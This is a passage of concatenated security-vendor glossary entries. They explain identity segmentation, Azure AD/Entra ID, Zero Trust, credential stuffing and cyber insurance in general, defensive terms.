generates valuable data that can be used for reporting and analysis. By tracking the relationship between user attributes, access, and permissions over time, organizations gain insight into usage patterns and can make data-driven decisions regarding access policies. How Does Identity Segmentation Work? Identity segmentation divides identities into groups based on risk factors like access privileges, applications used, and geographic location. This allows organizations to apply security controls tailored to the specific risks of each group. To implement identity segmentation, organizations first analyze identities and group them based on factors like: Job function and access needs (e. g. software engineers vs. HR staff) Applications and systems accessed (e. g. those using sensitive databases vs. public websites) Geographic location (e. g. headquarters office vs. remote workers) Previous security issues (e. g. identities with a history of phishing susceptibility) Once identities have been segmented, security controls are customized for each group. For example: Identities accessing sensitive data may require multi-factor authentication and data encryption Remote workers could face additional monitoring and device security checks Groups with higher risk are prioritized for security awareness training A "least privilege" approach is used to grant each segment only the minimum access needed. Access is regularly reviewed and revoked when no longer needed. Technologies like Identity and Access Management (IAM), Privileged Access Management (PAM) and Zero Trust Network Access (ZTNA) are often used to facilitate identity segmentation. They provide granular control over identity and access policies, allowing tailored rules to be applied for each segment. When implemented effectively, identity segmentation helps reduce the risk of a breach by minimizing the potential damage. If one segment is compromised, the attack is contained to that group and cannot spread easily to others. This "blast radius" limiting effect makes identity segmentation an important tool for modern cyber defense. Risks and Challenges of Identity Segmentation Identity segmentation, or separating user identities into logical groupings, introduces risks that organizations must address to ensure secure access management. Lack of Governance Without proper governance, identity segmentation can lead to vulnerabilities. Policies and controls must define who can access which systems and data based on business needs and compliance requirements. If governance is lacking, identities may be improperly segmented or have excessive access, creating opportunities for data breaches or insider threats. Human Error Manual processes for assigning users to identity segments are prone to human error. Mistakes like assigning a user to the wrong segment or giving too much access can have serious consequences. Automating identity segmentation where possible and implementing review processes can help minimize risks from human error. Conflicting Controls If controls for different identity segments conflict or overlap, users may end up with unintended access. For example, if a user belongs to two segments with different levels of access for the same system, the access level that provides greater permissions may take precedence. Organizations must evaluate how controls for different segments interact to ensure secure access. Lack of Visibility Without a comprehensive view of how identities are segmented and managed, organizations cannot properly assess and address risks. They need visibility into which users belong to which segments, how access is controlled for each segment, how segments inherit access from one another, and more. Gaining this visibility is key to governance, auditing, and risk mitigation. Network Segmentation vs Identity Segmentation Network segmentation involves dividing a network into different segments to enhance security and control. Traditional network segmentation relies on factors like IP addresses, VLANs, and physical separation to create these segments. While effective at limiting the impact of a breach within the network, network segmentation often falls short in addressing the dynamic and evolving nature of user identities. On the other hand, identity segmentation shifts the focus to user identities. This approach aligns with modern security threats where users are the primary targets and threats often exploit compromised credentials. Identity segmentation involves creating access controls based on user attributes, roles, and behavior, so users can only access the resources necessary for their roles, irrespective of their network location. The primary difference lies in their focus: network segmentation emphasizes securing pathways and infrastructure, while identity segmentation centers on safeguarding individual user identities. Network segmentation tends to rely on static policies based on network structure, whereas identity segmentation involves dynamic and context-aware access controls based on user attributes. Identity segmentation is particularly effective in countering identity-based threats, which have become increasingly prevalent in the cybersecurity landscape. How does identity segmentation improve security? Identity segmentation improves security by enabling targeted protection of sensitive resources. Rather than a one-size-fits-all approach, controls can be tailored to the specific risks of each segment. For example, identities with access to customer data may have stricter controls than those used by front-office staff. Segmentation also simplifies compliance by mapping controls directly to data access requirements for each role. Conclusion Identity segmentation is an important cybersecurity concept that allows organizations to isolate sensitive and privileged accounts. By applying the principle of least privilege and limiting access to only authorized individuals, companies can reduce their risk exposure and ensure compliance. Though implementing identity segmentation requires time and resources, the long-term benefits to data security and privacy are well worth the investment. With the increasing complexity of IT infrastructure and the constant threat of breaches, identity segmentation will continue to be a best practice that organizations tend to. --- - Published: 2023-10-11 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/azure-ad/ Microsoft’s cloud-based identity and access management service offering single sign-on, multifactor authentication, and integration with on‑premises Active Directory for hybrid identity solutions. Azure Active Directory (Azure AD, now called Entra ID) is Microsoft's cloud-based identity and access management service. It provides single sign-on and multifactor authentication to help organizations securely access cloud applications and on-premises apps. Entra ID allows organizations to manage users and groups. It can integrate with on-premises Active Directory to provide a hybrid identity solution. Main Features of Entra ID Entra ID’s main features include: Single sign-on (SSO) - Allows users to sign in once with one account to access multiple resources. This reduces the number of passwords needed and improves security. Multi-Factor authentication (MFA) - Provides an extra layer of security for signing in to resources. It requires not only a password but also a verification code sent to the user's phone or an app notification. Application management - Administrators can add, configure, and manage access to SaaS applications like Office 365, Dropbox, Salesforce, etc. Users can then access all their applications through the Entra ID access panel. Role-based access control (RBAC) - Provides fine-grained access management for Entra resources and applications based on a user's role. This ensures users have access only to what they need to perform their jobs. Monitoring and reporting - Entra ID provides logs, reports, and alerts to help monitor activity and gain insights into access and usage. This information can help detect potential security issues. Self-service password reset - Allows users to reset their own passwords without calling helpdesk support. This reduces costs and improves the user experience. User provisioning - Users can be manually created and managed in the Entra ID portal, allowing administrators to define attributes, roles, and access rights. And more - Other capabilities include mobile device management, B2B collaboration, access reviews, conditional access, etc. How Entra ID Works Entra ID works by syncing with on-premises directories and allowing single sign-on to cloud applications. Users can sign in once with one account and gain access to all their resources. Entra ID also enables multi-factor authentication, access management, monitoring, and security reporting to help protect user accounts and control access. How Directory Synchronization Works Entra ID Connect synchronizes on-premises directories like Active Directory Domain Services with Entra ID. This allows users to use the same credentials for both on-premises and cloud resources. Entra ID Connect synchronizes objects like: User accounts Groups Contacts This synchronization process matches on-premises directory objects to their Entra ID counterparts and ensures changes are reflected in both directories. Single Sign-On In single sign-on (SSO), users are able to access multiple applications with a single login. Entra ID provides SSO through Security Assertion Markup Language (SAML) and OpenID Connect (OIDC) protocols with thousands of pre-integrated applications. With seamless access, users do not have to re-enter their credentials each time they access an app. Conditional Access Entra ID Conditional Access allows administrators to set access controls based on conditions like: User location Device state Risk level Application accessed Admins can block access or require multi-factor authentication to help reduce risk. Conditional Access provides an extra layer of security for accessing resources. What is Windows Active Directory? Windows Active Directory (AD) is Microsoft's directory service for Windows domain networks. It stores information about objects on the network, like users, groups, and computers. AD allows network administrators to manage users and resources in a Windows environment. AD uses a hierarchical database to store information about objects in the directory. The objects include: Users - Represent individual users like employees. Contains info like username, password, and groups they belong to. Groups - Collections of users and other groups. Used to assign permissions to multiple users at once. Computers - Represent individual machines on the network. Stores info like computer name, IP address, and groups it belongs to. Organizational Units (OUs) - Containers used to group users, groups, computers, and other OUs. Help organize objects in the directory and assign permissions. Domains - Represent a namespace and security boundary. Made up of OUs, users, groups and computers. The directory service ensures objects with the same domain name share the same security policies. Trusts - Allow users in one domain to access resources in another domain. Created between two domains to enable cross-domain authentication. Sites - Represent physical locations of subnets on the network. Used to optimize network traffic between objects located in the same site. AD allows system administrators to have a centralized location to manage users and resources in a Windows environment. By organizing objects like users, groups and computers into a hierarchical structure, AD makes it easy to apply policies and permissions across an entire network. Difference Between Windows AD and Entra ID Windows Active Directory (AD) and Entra ID are both directory services from Microsoft, but they serve different purposes. Windows AD is an on-premises directory service for managing users and resources in an organization. Entra ID is Microsoft's multi-tenant cloud-based directory and identity management service. Windows AD requires physical domain controllers to store data and manage authentication. Entra ID is hosted in Microsoft's cloud services, so no on-premises servers are needed. Windows AD uses the LDAP protocol, while Entra ID uses RESTful APIs. Windows AD is designed primarily for on-premises resources, while Entra ID is designed to manage identities and access to cloud applications, software as a service (SaaS) apps, and on-premises apps. User management In Windows AD, users are synced from on-premises Windows servers and managed locally. In Entra ID, users can be created and managed in the cloud portal or synced from on-premises directories using Entra ID Connect. Entra ID also supports bulk user creation and updates through the Entra ID Graph API or PowerShell. Application management Windows AD requires manual configuration to publish on-premises applications. Entra ID has a different of pre-integrated SaaS apps and enables automatic provisioning of users. Custom applications can also be added to Entra ID for single sign-on using SAML or OpenID Connect. Authentication Methods Windows AD uses Kerberos and NTLM for on-premises authentication. Entra ID supports authentication protocols like SAML, OpenID Connect, WS-Federation and OAuth 2. 0. Entra ID also provides multi-factor authentication, conditional access policies and identity protection. Directory synchronization Entra ID Connect can synchronize identities from Windows AD to Entra ID. This allows users to sign in to Entra ID and Office 365 using the same username and password. Directory synchronization is one-way, updating Entra ID with changes from Windows AD. In summary, while Windows AD and Entra ID are both Microsoft directory services, they serve very different purposes. Windows AD is for managing on-premises resources, while Entra ID is a cloud-based service for managing access to SaaS applications and other cloud resources. For many organizations, using Windows AD and Entra ID together provides the most complete solution. Entra ID Features Entra ID provides essential identity and access management capabilities for Azure and Microsoft 365. It offers core directory services, advanced identity governance, security, and application access management. Core directory services Entra ID acts as a multi-tenant cloud directory and identity management service. It stores information about users, groups, and applications and synchronizes with on-premises directories. Entra ID provides single sign-on (SSO) access to apps and resources. It supports open standards like OAuth 2. 0, OpenID Connect, and SAML for SSO integrations. Identity governance Entra ID includes capabilities for managing the identity lifecycle. It provides tools for provisioning and deprovisioning user accounts based on HR data or when employees join, move within, or leave an organization. Conditional access policies can be configured to require multi-factor authentication, device compliance, location restrictions, and more when accessing resources. Entra ID also allows administrators to configure self-service password reset, access reviews, and privileged identity management. Security Entra ID utilizes adaptive machine learning algorithms and heuristics to detect suspicious sign-in activities and potential vulnerabilities. It provides security reports and alerts to help identify and remediate threats. Microsoft also offers Entra ID Premium P2 which includes Identity Protection and Privileged Identity Management for added security. Application access management Entra AD enables single sign-on access to thousands of pre-integrated SaaS apps in the Entra AD app gallery. It supports provisioning users and enabling SSO for custom applications as well. Application proxy provides secure remote access to on-premises web applications. Entra AD B2C offers customer identity and access management for customer-facing applications. In summary, Azure AD is Microsoft’s multi-tenant cloud directory and identity management service. It provides essential capabilities like core directory services, identity governance, security features, and application access management to enable organizations to manage user identities and secure access to resources in Azure, Microsoft 365, and other SaaS applications. Benefits Of Entra AD Entra AD provides several benefits for organizations: Increased Security Entra AD provides robust security features like multi-factor authentication, conditional access, and identity protection. MFA adds an extra layer of security for user sign-ins. Conditional access allows organizations to implement access controls based on factors like user location or device state. Identity protection detects potential vulnerabilities and risks to a user’s account. Streamlined Access Management Entra AD simplifies the management of user accounts and access. It provides a single place to manage users and groups, set access policies, and assign licenses or permissions. This helps reduce administrative overhead and ensures consistent policy enforcement across an organization. Seamless Single Sign-On With Entra AD, users can sign in once using their organizational account and access all their cloud and on-premises applications. This single sign-on experience improves productivity and reduces password fatigue for users. Entra AD supports single sign-on for thousands of pre-integrated applications as well as custom applications. Increased Productivity By enabling single sign-on and streamlining access management, Entra AD helps increase end user productivity. Users can quickly access all their applications and resources without having to repeatedly sign in with different credentials. They spend less time managing multiple logins and passwords and more time engaged with the applications and resources they need. Cost Savings For many organizations, Entra AD may help reduce costs associated with on-premises identity solutions. It eliminates the need to purchase and maintain hardware and software for identity management. And by simplifying access management and enabling single sign-on, it can help reduce help desk costs related to password resets and access issues. Common Attacks Against Entra AD Common attacks against Entra AD include: Password spray attacks Password spray attacks are attempts to access multiple accounts by guessing common credentials. Attackers will try passwords like “Password1” or “1234” hoping they match accounts in the organization. Enabling multi-factor authentication and password policies can help prevent these kinds of brute force attacks. Phishing attacks Phishing attacks try to steal user credentials, install malware, or trick users into granting access to accounts. Attackers will send fraudulent emails or direct users to malicious websites that mimic the look and feel of legitimate Entra AD login pages. Educating users about phishing techniques and enabling multi-factor authentication can help reduce the risk of compromise from phishing. Token theft and replay Access tokens issued by Entra AD can be stolen and replayed to gain access to resources. Attackers will try to trick users or applications into revealing access tokens, then use those tokens to access data and systems. Enabling multi-factor authentication and only issuing short-lived access tokens help prevent token theft and replay attacks. Rogue account creation Attackers will create accounts in Entra AD to use for reconnaissance, as a jumping off point for lateral movement in the network, or to blend in as a legitimate account. Tightening account creation policies, enabling multi-factor authentication, and monitoring for anomalous account activity can help detect rogue account creation. Malware and malicious applications Malware, malicious applications, and compromised software can be used to extract data from Entra AD, spread to other accounts and systems, or maintain persistence in the network. Carefully controlling what third-party applications have access to your Entra AD data and accounts, monitoring for signs of compromise, and educating users about safe application usage help reduce the risk from malicious software. Conclusion Entra AD provides essential identity and access management capabilities like multi-factor authentication, conditional access, identity protection, privileged identity management, and more. For any organization looking to improve... --- - Published: 2023-10-11 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/zero-trust/ A cybersecurity framework that eliminates any implicit trust within a network by continuously verifying every user and device, enforcing least-privilege access, micro-segmentation, and automated threat response to proactively minimize breaches and lateral movement. Zero Trust is a cybersecurity framework that eliminates the idea of a trusted network inside a company's perimeter. It takes the approach that no user, device, or service should automatically be trusted. Instead, anything and everything trying to access resources in a network must be verified before access is granted. The core principle of Zero Trust is "never trust, always verify. How does Zero Trust differ from traditional security models? Traditional security models have focused on establishing a hardened network perimeter. Once inside, users and their devices had relatively free access to all systems and resources. Zero Trust, by contrast, eliminates any concept of perimeter and instead “assumes the breach” by verifying every request as if it had originated from outside of a secure network. Zero Trust thus relies on granular, per-request authentication and authorization. The Principles of Zero Trust Zero Trust is a security model that eliminates any implicit trust in a network environment and instead requires the continuous verification of user access and activity. The core principles of Zero Trust are: Never trust, always verify. Zero Trust assumes that there may be threat actors already operating inside a network. It continually analyzes every access request, device compliance, user activity, and network events in order to immediately detect and isolate any compromised accounts or systems. Verify explicitly. Zero Trust requires explicit identity verification for every device and user, regardless of their location. Authentication and authorization are tightly controlled and constantly monitored. Secure access based on the principle of least privilege. Zero Trust limits user access to only what is necessary. Just-in-time and just-enough access are granted based on dynamic policies that have been put in place. Inspect and log everything. Zero Trust uses network inspection and monitoring tools to get complete visibility into all network traffic, user and device activity, as well as network events. Logs are continuously analyzed in order to immediately detect threats and prevent unauthorized access. Enforce segmentation and micro-perimeters. Zero Trust segments a network into micro-perimeters and enforces security controls between segments. Access between micro-perimeters is granted on a per-session basis. Automate security actions. Zero Trust uses security orchestration, automation, and response (SOAR) tools to automatically respond to detected threats, enforce policies, and adapt access rules. This minimizes windows of opportunity for threats to spread. Zero Trust is a comprehensive cybersecurity framework that addresses the modern threat landscape. By eliminating any implicit trust in a network and strictly controlling user access, Zero Trust helps prevent data breaches, stop ransomware, and reduce the impact of insider threats. For any organization, Zero Trust means proactively reducing risk through a "never trust, always verify" approach to cybersecurity. Zero Trust Architecture A Zero Trust architecture implements these principles through a series of security controls. Some of the key components include: Multi-factor authentication (MFA): Requiring multiple methods to verify a user’s identity, including a combination of passwords, security keys, and biometrics. Micro-segmentation: Dividing networks into small zones and requiring authentication to access each zone. This limits any potential damage from a breach. Endpoint security: Ensuring all devices on the network meet strict security standards, such as running the latest software patches and deploying sophisticated anti-malware tools. Devices that do not comply are automatically denied access. Data encryption: Encrypting all data – both at rest and in transit – to protect it even if other defenses fail. Security analytics: Monitoring networks and user activity in real-time to detect any threats as they emerge. Analytics tools can immediately identify anomalies that could indicate a breach or insider threat. Orchestration: Coordinating all security tools through a central system in order to simplify management and ensure consistent policy enforcement across the organization. Zero Trust is a proactive approach that aims to stop breaches before they start by eliminating the implicit trust that is traditionally granted to any user inside a network perimeter. With Zero Trust, security is integrated into every aspect of the network, and access is granted based on the continuous verification of identities and each device’s security posture. The Challenges of Implementing Zero Trust Implementing a Zero Trust security model presents several significant challenges for organizations. Zero Trust radically changes how companies approach cybersecurity, shifting the focus from securing network perimeters to protecting specific resources and data. This new approach requires rethinking many long-held assumptions and security practices. Transitioning legacy systems and infrastructure to align with Zero Trust principles is a complex undertaking. Many companies have invested heavily in perimeter-based defenses like firewalls, so replacing or upgrading these systems requires time, money, and expertise. Zero Trust also demands stronger identity and access management (IAM) to control user access. Implementing new identity management solutions and revising access policies can be complicated for large organizations. Zero Trust requires meticulous asset management and network segmentation in order to limit access and contain breaches. However, accurately identifying and cataloging all assets, especially in expansive corporate networks, is notoriously difficult. Segmenting networks and putting controls in place to limit lateral movement also challenges many traditional architectures and security models. These fundamental changes may necessitate network redesigns and the deployment of new security tools. Organizational culture and user behaviors can also pose problems. Employees must embrace the idea of Zero Trust and thus adapt to a new way of accessing resources. But long-held habits and assumptions are hard to break, and users may push back against new security processes that impact their productivity or are inconvenient. This is why education and training are essential even if they require a concerted effort to scale across an entire workforce. Zero Trust is a complex cybersecurity model that delivers substantial benefits, but also demands a significant investment of resources in order to implement properly. Transitioning from legacy, perimeter-based defenses to a Zero Trust architecture requires redesigning systems, revising policies, and changing organizational culture. For many companies, these transformational changes can happen gradually through iterative, multi-year initiatives. With time and commitment, Zero Trust can become the new normal.   The Benefits of Adopting a Zero Trust Framework The adoption of a Zero Trust framework offers several key benefits to organizations. Improved Security Posture By eliminating any implicit trust and requiring explicit verification of every device and user, Zero Trust significantly strengthens an organization's security posture. It helps reduce the risk of breaches by minimizing the potential attack surface and enforcing strict access controls. Zero Trust also makes it much more difficult for attackers to move laterally within a network. Better Visibility A Zero Trust approach provides comprehensive visibility into all users, devices, and network traffic. With granular monitoring and logging, security teams gain real-time insight into access attempts, enabling faster detection of anomalies and potential threats. Analytics and reporting also help identify vulnerabilities and weak spots in security policies. Simplified Security Management Zero Trust consolidates multiple security controls into a single framework with centralized management and policy configuration. This simplifies administration and helps reduce complexity. Security teams can craft customized access policies based on a user's role, device, location, and other attributes. They can also easily make changes to user access as needed. Improved User Experience While Zero Trust enhances security, it does not need to negatively impact user experience. With authentication schemes like single sign-on (SSO), users can access corporate resources seamlessly. Conditional access policies can also be put in place so as not to restrict users unnecessarily. These can provide access based on a real-time assessment of risk so that users can remain productive wherever and whenever they need to work. Facilitates Compliance The strict access controls and auditing capabilities promoted by Zero Trust help organizations achieve and maintain compliance with a host of regulations, including HIPAA, GDPR, and PCI DSS. A properly implemented Zero Trust framework can provide evidence that sensitive data and critical systems are properly secured, monitored, and segmented. It can also generate audit trails and reports for compliance audits. In summary, Zero Trust is a robust, integrated framework that strengthens security, provides visibility, simplifies management, improves user experience, and enables compliance. For these significant benefits, Zero Trust is gaining mainstream adoption as a strategic approach to enterprise cybersecurity. Zero Trust Use Cases Zero Trust is an approach to cybersecurity that assumes there may be malicious actors already operating inside a network. It therefore requires strict identity verification for every user and device trying to access resources on a private network, regardless of whether they are located within or outside the network perimeter. The Zero Trust model is centered on the belief that organizations should never automatically trust any user. Zero Trust focuses on protecting individual resources rather than entire network segments, and thus provides the least amount of access needed to authorized users. It relies on multiple factors to authenticate user identity before granting access to applications and data. Data Access Zero Trust is particularly useful for providing secure access to data. It utilizes strong authentication and granular access controls to limit data access to only authorized users and applications. Zero Trust thus prevents any lateral movement across a network, therefore containing any breaches and preventing unauthorized access to sensitive data. It provides a layered security model that helps protect against both internal and external threats. Cloud Environments Zero Trust is well suited for securing cloud environments where the traditional network perimeter has dissolved. It focuses on the identity of users and the sensitivity of data to determine who gets access to what, rather than relying on static network controls. Zero Trust therefore provides a consistent security framework across both on-premises and cloud environments through centralized visibility and control. Remote Workforces Zero Trust is very effective in terms of securing remote workforces where there are many employees accessing corporate resources from outside the physical office. It provides consistent and granular access controls for all users regardless of their location. Multi-factor authentication (MFA) and device security ensure that only authorized individuals and compliant endpoints can access sensitive applications and data remotely. Zero Trust thus eliminates the need for full-access virtual private networks (VPNs), which often provide much more access than is actually needed. In summary, Zero Trust is a modern approach to cybersecurity that is well suited for today's digital environments. When implemented properly, it provides secure access and reduces risk across an entire organization. Zero Trust should therefore be a foundational component of any enterprise security strategy. Conclusion With the dissolution of the traditional perimeter, including the rise of hybrid work and bring-your-own-device (BYOD) policies, Zero Trust is becoming a critical philosophy. By explicitly verifying each request as if it had originated from outside a secure network, Zero Trust helps minimize the potential attack surface. Zero Trust also reduces the time to detect and respond to threats through its principles of least-privilege access and microsegmentation. For organizations who want to strengthen their security posture, adopting a Zero Trust model is an essential strategy to reduce risk in today's complex digital world. --- - Published: 2023-02-23 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/credential-stuffing/ A cyberattack technique where automated tools test stolen or leaked credentials across multiple services to gain unauthorized access due to reused login details. Credential stuffing is a type of cyber attack that involves using compromised credentials to gain unauthorized access to user accounts. This technique relies on the fact that many people use the same username and password combinations across multiple websites and services, making it easy for attackers to test these credentials against different platforms until they find a match. Once they have gained access to an account, attackers can steal sensitive information, commit fraud, or carry out other malicious activities. While credential stuffing attacks are not new, they have become increasingly common in recent years due to the widespread availability of compromised credentials on the dark web. These credentials are often obtained through data breaches or phishing scams and can be purchased by anyone with a few dollars to spare. As a result, even companies with strong security measures in place can fall victim to credential stuffing if their users' login details have been compromised elsewhere. How Credential Stuffing Works: Techniques and Methods Credential stuffing is a type of cyber attack that relies on the use of automated tools to test large numbers of stolen login credentials (username and password pairs) against various websites and applications. The goal is to gain unauthorized access to user accounts, which can then be used for fraudulent activities such as identity theft, financial fraud, or spamming. To achieve this, attackers typically use a combination of techniques and methods that exploit vulnerabilities in the authentication process. One common technique used in credential stuffing attacks is called "list-based" or "dictionary-based" attacks. This involves using pre-existing lists of usernames and passwords that have been obtained from previous data breaches or other sources. These lists are then fed into an automated tool that tries each combination until it finds one that works. Another technique is known as "credential cracking," which involves using brute-force methods to guess passwords by trying every possible combination until the correct one is found. In addition to these techniques, attackers may also use more sophisticated methods such as "credential spraying," which involves targeting a large number of users with a small number of commonly used passwords (such as "password123") in order to increase their chances of success. They may also use social engineering tactics such as phishing emails or fake login pages to trick users into revealing their credentials directly. What is the difference between Credential Stuffing and Brute Force Attacks? Credential stuffing and brute force attacks are both techniques used by hackers to gain unauthorized access to user accounts. While they share the common goal of obtaining login credentials, they differ in their approaches and methodologies. Credential stuffing relies on reused credentials from data breaches and automated scripts to gain unauthorized access, while brute force attacks involve systematically trying all possible combinations of usernames and passwords. Here's a breakdown of the main differences between credential stuffing and brute force attacks:  Credential StuffingBrute Force AttacksMethodologyAutomated testing of username/password combinations against multiple websites or servicesExhaustive trial-and-error approach, checking all possible combinations of usernames and passwordsExploiting Password ReuseRelies on users reusing the same credentials across multiple accountsDoes not rely on stolen credentials, but rather attempts to guess the password through computational powerAutomationHighly automated, using scripts or bots to test large numbers of credentials simultaneouslyRequires computational power to systematically check all possible combinationsSpeedCan be executed quickly, as it tries known credentials rather than attempting to guess or crack passwordsCan be time-consuming, especially for complex and lengthy passwords or strong encryptionRisk MitigationWebsites can implement rate limiting, multi-factor authentication, and monitoring for suspicious login activityWebsites may implement account lockouts, CAPTCHA challenges, or time delays between login attempts Common Targets of Credential Stuffing Attacks: Industries and Websites Credential stuffing attacks are a growing concern for businesses across various industries. Cybercriminals target websites that store sensitive information, such as login credentials, to gain unauthorized access to user accounts. Some of the most common targets of credential stuffing attacks include financial institutions, e-commerce platforms, and social media networks. Financial institutions are particularly vulnerable to credential stuffing attacks due to the nature of their business. Hackers can use stolen login credentials to access bank accounts and steal money or personal information. E-commerce platforms are also popular targets because they store payment information and other sensitive data. Social media networks are targeted because they contain a wealth of personal information that can be used for identity theft or other malicious purposes. In addition to these industries, any website that requires users to create an account is at risk of a credential stuffing attack. This includes online gaming platforms, streaming services, and even healthcare providers. As more businesses move online and store sensitive data in digital form, the threat of credential stuffing attacks will continue to grow. Consequences of Credential Stuffing: Data Breaches and Identity Theft Credential stuffing attacks can have severe consequences for both individuals and organizations. One of the most significant outcomes of these attacks is data breaches, which can result in the exposure of sensitive information such as personal details, financial data, and login credentials. Once this information falls into the wrong hands, cybercriminals can use it to carry out further attacks or sell it on the dark web. Another consequence of credential stuffing is identity theft. Cybercriminals can use stolen login credentials to gain access to a victim's accounts and steal their identity. This can lead to financial losses, damage to credit scores, and even legal issues if the attacker uses the victim's identity for illegal activities. The impact of credential stuffing attacks goes beyond just financial losses and reputational damage for businesses. It also affects individuals who fall victim to these attacks. Therefore, it is crucial that individuals take steps to protect themselves by using strong passwords and enabling two-factor authentication wherever possible. What are the challenges in detection and prevention of credential stuffing? Legitimate credentials: Credential stuffing attacks involve the use of stolen usernames and passwords, which are legitimate credentials on their own. Since attackers are not generating random combinations, it becomes harder to differentiate between legitimate login attempts and malicious ones. Distributed attacks: Attackers often distribute their login attempts across multiple IP addresses and employ techniques like botnets or proxy servers. This distribution helps them evade detection by security systems that typically monitor login attempts from a single IP address. Traffic patterns: Credential stuffing attacks aim to mimic legitimate user behavior and traffic patterns, making it difficult to distinguish between genuine login attempts and malicious ones. Attackers may gradually increase their login frequency to avoid triggering account lockouts or generating suspicious traffic patterns. Evolving attack methods: Attackers constantly adapt their techniques to bypass detection mechanisms. They may employ sophisticated bot software that mimics human behavior, utilize headless browsers to bypass security controls, or leverage CAPTCHA-solving services to automate the authentication process. Use of botnets: Attackers often use botnets, which are networks of compromised computers, to distribute and coordinate credential stuffing attacks. The use of botnets makes it challenging to identify and block the malicious traffic, as it may appear to originate from various sources. Stolen credentials availability: The availability of vast quantities of stolen usernames and passwords on the dark web and other illicit platforms makes it easier for attackers to conduct credential stuffing attacks. This abundance of compromised credentials increases the potential targets and makes detection more difficult. What makes credential stuffing harder to protect than brute force attacks? Credential stuffing attacks and brute force attacks are both methods used to gain unauthorized access to user accounts, but they differ in terms of their approach and detection challenges. Here's an overview of the differences: Approach: Brute force attacks: In a brute force attack, an attacker systematically tries every possible combination of usernames and passwords until they find the correct one. This method requires the attacker to generate and test a large number of combinations, which can be time-consuming. Credential stuffing attacks: In credential stuffing, attackers use pre-existing lists of stolen usernames and passwords obtained from previous data breaches or leaks. They automate the process of injecting these credentials into various websites or services to find accounts where users have reused their login information. Detection Challenges: Brute force attacks: Brute force attacks are often easier to detect because they involve a high volume of login attempts within a short period. Security systems can monitor and flag such suspicious behavior based on factors like the frequency and rate of login attempts from a single IP address. Credential stuffing attacks: Detecting credential stuffing attacks can be more challenging due to several reasons: Legitimate credentials: Attackers use valid combinations of usernames and passwords, which are not inherently suspicious on their own. Distributed attempts: Instead of a single IP address attempting multiple logins, credential stuffing attacks are often distributed across multiple IP addresses, making it harder to identify them based on login patterns alone. Login failures: Attackers typically avoid triggering account lockouts or generating an excessive number of failed login attempts, reducing the chances of being flagged by traditional security systems. Traffic patterns: Credential stuffing attacks can mimic legitimate user behavior and generate traffic patterns similar to normal login activity, making it difficult to distinguish between genuine and malicious login attempts. What makes credential stuffing harder to protect than password spray attacks? Credential stuffing and password spray attacks are both methods used to compromise user accounts, but they differ in their approach and the challenges they pose for detection and prevention. Here's why credential stuffing can be harder to detect and prevent compared to password spray attacks: Approach: Credential stuffing: Attackers leverage lists of stolen usernames and passwords obtained from previous data breaches or leaks. They automate the process of injecting these credentials into various websites or services to find accounts where users have reused their login information. Password spray: Attackers use a small set of commonly used or easily guessable passwords (e. g. , "123456" or "password") and attempt to log in to multiple user accounts by spraying these passwords across various usernames. Detection and Prevention Challenges: Username diversity: In credential stuffing attacks, attackers use legitimate usernames along with stolen passwords. Since the usernames are not random or easily guessable, it becomes challenging to detect the malicious activity based solely on the usernames being targeted. Low failure rate: Credential stuffing attacks aim to avoid triggering account lockouts or generating excessive failed login attempts. Attackers may use low failure rates by only attempting to log in with valid credentials, which makes it harder to identify and block the attack based on failed login attempts. Distributed nature: Credential stuffing attacks are often distributed across multiple IP addresses or botnets, making it difficult to identify the coordinated attack pattern compared to password spray attacks, which typically involve a single or limited number of IP addresses. Mimicking legitimate traffic: Credential stuffing attacks aim to mimic legitimate user behavior and traffic patterns. Attackers carefully space out their login attempts, simulate human-like activity, and avoid suspicious patterns that may trigger detection mechanisms. Availability of stolen credentials: The abundance of stolen credentials available on the dark web and other illicit platforms makes it easier for attackers to conduct credential stuffing attacks with a large pool of compromised accounts. Variation in passwords: Password spray attacks rely on a small set of passwords that are commonly used or easily guessable. In contrast, credential stuffing attacks leverage stolen passwords that can be more diverse and unique, making it harder to identify the attack based on a particular password being sprayed. How to Detect and Prevent Credential Stuffing Attacks One of the most important steps in protecting against credential stuffing attacks is to be able to detect them. There are several signs that can indicate a potential attack, including an increase in failed login attempts, unusual activity on user accounts, and unexpected changes to account information. It's important for individuals and organizations to monitor their accounts regularly and report any suspicious activity immediately. Preventing credential stuffing attacks requires a multi-layered approach. One effective method is to implement two-factor authentication (2FA), which adds an extra layer of security by requiring users to provide a... --- - Published: 2023-02-23 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/cyber-insurance/ Insurance designed to protect individuals or organizations from financial and operational losses caused by cyber events, such as data breaches or attacks, through first-party and third-party coverage. Cyber insurance, also called cyber liability insurance or cyber risk insurance, is a type of insurance meant to protect people and businesses from financial losses and damages caused by cyber-related events. It gives financial help and support in case of cyber attacks, data breaches, and other cyber events that could compromise private information, stop business operations, or cause financial harm. What is the importance of cyber insurance in the digital age? In the digital age, when businesses depend heavily on technology and cyber threats are getting more complex, cyber insurance offers crucial financial and operational safeguards in the face of cyber risks in today's digital landscape. Here are a few of the most important reasons why cyber insurance is so important in today's digital world: Financial protection against cyber-related losses. Risk transfer to minimize financial burden on organizations. Incident response support from experts in managing cyber incidents. Business continuity coverage during disruptions caused by cyber attacks. Assistance with legal and regulatory compliance. Encouragement of risk management practices and prevention efforts. Management of cyber risks in vendor and supply chain relationships. Peace of mind by providing a safety net against evolving cyber threats. What does cyber insurance cover? Cyber insurance policies vary widely in terms of the types of coverage offered, the limits of liability, and the exclusions and conditions. These policies are designed to address the unique risks and financial implications of cyber incidents and they typically offer coverage in two main areas: first-party and third-party. First-Party Coverage First-party coverage focuses on protecting the insured organization's own losses and expenses incurred as a result of a cyber incident. The following elements are commonly included in first-party coverage: Data Breach Response and Investigation: This coverage assists with the costs associated with incident response, including forensic investigations, notifying affected individuals, providing credit monitoring services, and implementing measures to mitigate further damage. Business Interruption and Income Loss: In the event of a cyber attack that disrupts business operations, this coverage provides financial assistance to help recover lost revenue and cover ongoing expenses during the downtime. Extortion and Ransomware Payments: First-party coverage may include coverage for extortion payments or expenses related to responding to ransom demands, providing financial support to resolve such situations. Public Relations and Crisis Management: To manage reputational damage resulting from a cyber incident, this coverage assists with public relations efforts, crisis communication, and the associated expenses. Legal Expenses: Cyber insurance policies often cover legal fees and expenses incurred in response to a cyber incident, including regulatory investigations, lawsuits, and any necessary legal representation. Third-Party Coverage Third-party coverage provides protection against claims and legal actions brought by third parties affected by a cyber incident. It includes the following components: Liability for Data 